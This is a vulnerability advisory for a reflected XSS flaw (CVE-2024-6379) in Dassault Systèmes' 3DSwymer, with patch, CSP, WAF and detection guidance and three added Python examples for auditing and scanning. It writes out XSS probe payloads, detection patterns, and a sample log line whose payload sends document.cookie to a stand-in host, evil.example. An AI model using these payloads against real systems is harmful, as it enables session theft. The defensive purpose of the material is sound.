CVE-2024-6379
📋 TL;DR
A reflected Cross-site Scripting (XSS) vulnerability in the 3DSwymer component of the 3DEXPERIENCE platform lets an attacker who gets a user to open a crafted link run arbitrary script in that user's browser, in the context of the platform. This affects organizations running 3DEXPERIENCE releases R2022x through R2024x. Attackers can steal session cookies, redirect users, or perform actions on their behalf.
💻 Affected Systems
- 3DSwymer
- 3DEXPERIENCE Platform
📦 What is this software?
3DSwymer is the community and collaboration (3DSwym) component of Dassault Systèmes' 3DEXPERIENCE platform, used to share engineering and design content across teams.
⚠️ Risk & Real-World Impact
Worst Case
Attacker steals an administrator's session, gains full administrative access to the 3DEXPERIENCE platform, exfiltrates sensitive design data and uses that foothold as a stepping stone into connected systems. Deploying ransomware would require further weaknesses beyond this XSS.
Likely Case
Attacker steals user session cookies to access sensitive design files, modifies engineering data, or redirects users to phishing sites to harvest credentials.
If Mitigated
A nonce- or hash-based Content Security Policy (CSP) blocks the injected script from executing, reducing the attack to harmless content injection; with HttpOnly session cookies the session token is not readable even if a script did run, and no privilege escalation is possible.
🎯 Exploit Status
Reflected XSS requires user interaction: the victim must open an attacker-supplied link or submit a crafted form. No credentials are needed to craft the link, but the injected script executes with whatever 3DSwymer session the victim holds, so logged-in users are the target and the impact follows the victim's privileges.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Release 3DEXPERIENCE R2024x FP1 or later
Vendor Advisory: https://www.3ds.com/vulnerability/advisories
Restart Required: Yes
Instructions:
1. Download the latest patch from the Dassault Systèmes support portal.
2. Apply the patch following the vendor documentation.
3. Restart the 3DEXPERIENCE services.
4. Verify the patch installation (release and fix pack level).
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rules
Deploy WAF rules to block XSS payloads targeting 3DSwymer endpoints.
Add WAF rule: Block requests containing <script>, javascript:, on*= event handlers or common XSS payloads to /3DSwymer/* endpoints. Match on the URL-decoded and HTML-entity-decoded request, not the raw bytes: a rule that only looks for the literal string <script> is bypassed by %3Cscript%3E, &#60;script&#62;, mixed case or an attribute-breaking payload with no script tag at all. Run the rule in log-only mode first to catch legitimate parameters that contain markup characters. A WAF is a stop-gap; it does not fix the missing output encoding.
Content Security Policy (CSP)
Implement a CSP whose script-src does not permit inline script. A header such as Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' does not mitigate reflected XSS at all: 'unsafe-inline' is exactly what lets an injected <script> block or on* handler run, and 'unsafe-eval' lets eval() consume attacker-controlled strings. Use a nonce- or hash-based policy instead:
Add header: Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-<fresh random value per response>'; object-src 'none'; base-uri 'self'
Every legitimate <script> tag the platform emits must carry the matching nonce, so roll this out with Content-Security-Policy-Report-Only first and review the violation reports; a vendor application with many inline scripts may not tolerate a strict policy, which is why CSP is defence in depth and not a substitute for the patch.
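The following is an added example, not code from the page or from Dassault Systèmes, showing why the 'unsafe-inline' policy is ineffective and what a nonce-based replacement looks like. It parses a CSP value, reports the findings that leave script-src open to injected script (taking into account that browsers ignore 'unsafe-inline' once a nonce or hash is present), and builds a per-response policy with a fresh nonce. The policy strings are constructed for the demonstration.

```python
import secrets

# Constructed: the weak header discussed above, as a string to audit.
WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'"

# Source expressions that make a policy nonce- or hash-based.
SCRIPT_NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(policy):
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def effective_script_sources(directives):
    """script-src governs <script>; when absent, browsers fall back to default-src."""
    if "script-src" in directives:
        return directives["script-src"]
    return directives.get("default-src")  # None means no restriction at all


def audit_csp(policy):
    """Return findings that make the policy ineffective against reflected XSS."""
    findings = []
    sources = effective_script_sources(parse_csp(policy))
    if sources is None:
        return ["no script-src or default-src: any inline or remote script may execute"]
    has_nonce_or_hash = any(s.startswith(SCRIPT_NONCE_OR_HASH) for s in sources)
    # CSP2+ browsers ignore 'unsafe-inline' when a nonce or hash is present,
    # so only flag it when it is actually the effective rule.
    if "'unsafe-inline'" in sources and not has_nonce_or_hash:
        findings.append("'unsafe-inline' in script-src: injected <script> and on* handlers execute")
    if "'unsafe-eval'" in sources:
        findings.append("'unsafe-eval' in script-src: eval()/Function() on attacker-controlled strings")
    if "*" in sources or any(s in ("http:", "https:") for s in sources):
        findings.append("wildcard host source: scripts from any origin may load")
    return findings


def new_nonce():
    """Unguessable per-response nonce (128 bits, base64url)."""
    return secrets.token_urlsafe(16)


def build_csp(nonce):
    """Hardened policy: only <script nonce="..."> tags the server itself emitted may run."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'self'; frame-ancestors 'self'"
    )


if __name__ == "__main__":
    print("weak  :", audit_csp(WEAK_POLICY))
    nonce = new_nonce()
    print("strong:", build_csp(nonce), "->", audit_csp(build_csp(nonce)))
```

The nonce has to be generated per response and written into every legitimate script tag the application renders; a value reused across responses is as good as 'unsafe-inline', because an attacker who has seen one page knows it.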
🧯 If You Can't Patch
- Restrict network access to the 3DEXPERIENCE platform (VPN or internal-only exposure) so a crafted link only works for users already on the trusted network; this shrinks the attack surface but does not stop a phished insider from clicking.
- Browser-side controls are of limited value here: the injected script runs from the trusted 3DSwymer origin, so clickjacking protection or disabling JavaScript for untrusted sites does not prevent it. Shorten session lifetimes, mark session cookies HttpOnly and SameSite, and tell users not to open 3DEXPERIENCE links received in untrusted email or chat messages.
🔍 How to Verify
Check if Vulnerable:
With authorisation, and preferably on a non-production instance, submit a harmless probe such as <script>alert('XSS')</script> (or an attribute-breaking variant like "><img src=x onerror=alert(1)>, which defeats filters that only strip script tags) in URL parameters of 3DSwymer pages and inspect the raw HTML response. The instance is vulnerable if the payload comes back with its markup intact rather than entity-encoded or removed. The advisory does not name the affected parameter, so test the parameters 3DSwymer reflects into the page (search, filter and navigation parameters are the usual candidates); a probe that is not reflected at all proves nothing about other parameters.
Check Version:
Check the installed release and fix pack in the 3DEXPERIENCE administration console. If you read it from the file system instead (for example cat /var/log/3DS/version.log), the path depends on the installation, so confirm it against your own deployment.
Verify Fix Applied:
Confirm the installed release is R2024x FP1 or later, then repeat the probe and check that the payload is returned entity-encoded (for example &lt;script&gt;) or stripped, not as live markup.
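An added example, not from the page or the vendor, of the reflection check described above, written so that it runs offline against constructed responses. It builds the test URL for a hypothetical parameter (the /3DSwymer/search path and the q parameter are assumptions, since the advisory names neither), uses a unique canary so a hit cannot be confused with existing page content, and distinguishes a verbatim reflection (vulnerable) from an entity-encoded one (fixed) and from a partial filter that mangles the tag but leaves the event-handler attribute alive.

```python
import html
from urllib.parse import urlencode, urlparse, urlunparse

# Unique canary so a match cannot come from pre-existing page content.
CANARY = "xsscanary7f3a"
# Breaks out of an attribute value and adds an event handler. It contains no
# <script> tag, so a filter that only strips "<script>" still lets it through.
PAYLOAD = f'"><img src=x onerror="{CANARY}">'


def build_test_url(base_url, param, payload=PAYLOAD):
    """Attach the payload to one query parameter of base_url (param is hypothetical)."""
    parts = urlparse(base_url)
    return urlunparse(parts._replace(query=urlencode({param: payload})))


def classify_reflection(body, payload=PAYLOAD, canary=CANARY):
    """
    How did the payload come back in the HTML response?
      'raw'            verbatim, markup intact            -> reflected XSS
      'handler-intact' tag mangled but onerror="canary"
                       survived                           -> still exploitable in attribute context
      'encoded'        canary present, markup altered     -> escaped or filtered correctly
      'absent'         canary not present                 -> this parameter is not reflected here
    """
    if payload in body:
        return "raw"
    if f'onerror="{canary}"' in body:
        return "handler-intact"
    if canary in body:
        return "encoded"
    return "absent"


def probe(url, timeout=10):
    """Fetch url and classify it. Authorised testing only; needs network and, for
    3DSwymer, the victim-side session cookies, so it is not exercised offline."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"))


# Constructed responses standing in for a vulnerable page, a fixed page and an
# unrelated page; none of these is real 3DSwymer output.
VULNERABLE_PAGE = f'<input name="q" value="{PAYLOAD}">'
FIXED_PAGE = f'<input name="q" value="{html.escape(PAYLOAD, quote=True)}">'
UNRELATED_PAGE = "<p>No results.</p>"


if __name__ == "__main__":
    print(build_test_url("https://plm.example.internal/3DSwymer/search", "q"))
    for name, page in [("vulnerable", VULNERABLE_PAGE), ("fixed", FIXED_PAGE),
                       ("unrelated", UNRELATED_PAGE)]:
        print(f"{name:10s} -> {classify_reflection(page)}")
```

Inspect the response body, not the rendered page: a browser extension or the platform's own scripts may neutralise the payload on the client side while the server is still reflecting it raw.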
📡 Detection & Monitoring
Log Indicators:
- HTTP requests to 3DSwymer endpoints containing <script>, on*= event handlers or javascript: URIs, in raw or URL-/entity-encoded form (%3Cscript, &#60;script)
- Unusual parameter values in 3DSwymer URLs: markup characters, quotes, or lengths far above what that parameter normally carries
- Requests carrying such payloads whose Referer is an external site, a webmail host, or absent (the victim followed a link from elsewhere), and several users hitting the same crafted URL
Network Indicators:
- Outbound connections to suspicious domains after visiting 3DSwymer URLs
- Unusual data exfiltration patterns from 3DEXPERIENCE servers
SIEM Query:
source="3DSwymer" AND (url="*<script*" OR url="*%3Cscript*" OR url="*javascript:*" OR url="*javascript%3A*" OR url="*onerror=*" OR url="*onload=*" OR param="*alert(*")
If the SIEM can URL-decode the field (Splunk's urldecode() eval function, for example), match on the decoded value instead of enumerating encodings, and treat hits with an external or empty Referer as the higher-priority subset.
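An added example, not code from the page, that implements the detection logic above and the decoding the WAF rule under Temporary Workarounds needs. It parses combined-format access log lines, decodes the request target until it stops changing (URL encoding and HTML entities, so %3Cscript%3E and &#60;script&#62; both become <script>), matches XSS indicators on the decoded value, and records whether the Referer lies outside the platform. The log lines, the /3DSwymer paths, the parameter names and the host plm.example.internal are all constructed placeholders, not real 3DEXPERIENCE data.

```python
import html
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format). Paths, parameters and hosts are
# placeholders, not real 3DEXPERIENCE logs.
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Jun/2024:10:01:02 +0000] "GET /3DSwymer/communities?q=turbine HTTP/1.1" 200 512 "https://plm.example.internal/" "Mozilla/5.0"
10.0.0.9 - bob [12/Jun/2024:10:02:17 +0000] "GET /3DSwymer/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4091 "https://mail.example.net/" "Mozilla/5.0"
10.0.0.9 - bob [12/Jun/2024:10:02:40 +0000] "GET /3DSwymer/search?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dfetch(%27//evil.example/%27%2Bdocument.cookie)%3E HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
10.0.0.12 - carol [12/Jun/2024:10:03:00 +0000] "GET /3DSwymer/search?q=%26%2360%3Bscript%26%2362%3B HTTP/1.1" 200 4002 "-" "Mozilla/5.0"
10.0.0.12 - carol [12/Jun/2024:10:04:00 +0000] "GET /3DSwymer/search?q=javascript%3Aalert(document.domain) HTTP/1.1" 200 3999 "-" "Mozilla/5.0"
10.0.0.3 - dave [12/Jun/2024:10:05:00 +0000] "GET /3DSwymer/profile?name=O%27Brien HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators are checked against the decoded, lower-cased request target.
XSS_PATTERNS = {
    "script-tag": re.compile(r"<\s*/?\s*script\b"),
    "event-handler": re.compile(r"\bon[a-z]+\s*="),  # onerror=, onload=, ...; a parameter literally named on* also hits
    "javascript-uri": re.compile(r"javascript\s*:"),
    "tag-injection": re.compile(r"<\s*(img|svg|iframe|object|embed|body|a)\b"),
}


def normalize(target, rounds=3):
    """URL-decode and entity-decode repeatedly until stable, then lower-case.
    A literal '*<script>*' match on the raw URL misses %3Cscript%3E and &#60;script&#62;."""
    current = target
    for _ in range(rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current.lower()


def scan_log(text, own_host="plm.example.internal", path_prefix="/3dswymer/"):
    """Return one finding per request under path_prefix that carries XSS indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = normalize(m["target"])
        if not decoded.startswith(path_prefix):
            continue
        hits = [name for name, rx in XSS_PATTERNS.items() if rx.search(decoded)]
        if not hits:
            continue
        # Reflected XSS arrives via a link the victim followed from somewhere else,
        # so a Referer outside the platform (or none at all) is corroborating context.
        referer = m["referer"]
        findings.append({
            "client": m["client"], "user": m["user"], "time": m["time"],
            "target": m["target"], "decoded": decoded,
            "indicators": hits,
            "external_referer": referer == "-" or own_host not in referer,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["user"], f["indicators"],
              "external-referer" if f["external_referer"] else "", f["decoded"])
```

The same normalize step is what a WAF rule needs before pattern matching; applied to the sample, the entity-encoded and URL-encoded script tags are caught that a raw string match would miss, while the apostrophe in a legitimate name is not flagged.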